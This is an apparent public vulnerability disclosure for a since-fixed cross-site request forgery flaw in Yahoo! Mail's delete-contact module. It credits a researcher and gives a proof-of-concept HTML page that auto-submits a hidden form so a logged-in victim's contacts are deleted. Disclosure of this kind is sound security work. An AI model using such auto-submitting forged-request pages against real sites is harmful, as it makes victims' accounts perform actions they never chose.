Yahoo! Mail suffered from a delete contact cross site request forgery vulnerability. This has been fixed.
=======================================================================
YAHOOMAIL CSRF Vulnerability
=======================================================================
# Vulnerability found in: Yahoomail Delete Contact module
# Email: prakhar.agrawal26@gmail.com
# Company: AKS IT Services Pvt. Ltd
# Credit: Prakhar Agrawal
# Email Service: Yahoomail
# Category: Mail service
# Site page: http://www.yahoomail.com
# Platform: Java
# Proof of concept #
Targeted URL: http://address.mail.yahoo.com/
Script to delete contacts from the contact list through cross site request forgery (the victim only has to be logged in to Yahoo! Mail and load the attacker's page):
. ................................................................................................................
<html>
<body>
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
<input type=hidden name="action" value="delete_contacts">
<input type=hidden name="id" value="$Numeric No.$">
</form>
<script>document.csrf.submit();</script>
</body>
</html>
. ..................................................................................................................
Put any numeric value (e.g. 1, 2, 3, 4) in the id parameter and load the page; the forged request is accepted and the corresponding contact is deleted, so the CSRF works.
# If you have any questions, comments, or concerns, feel free to contact me.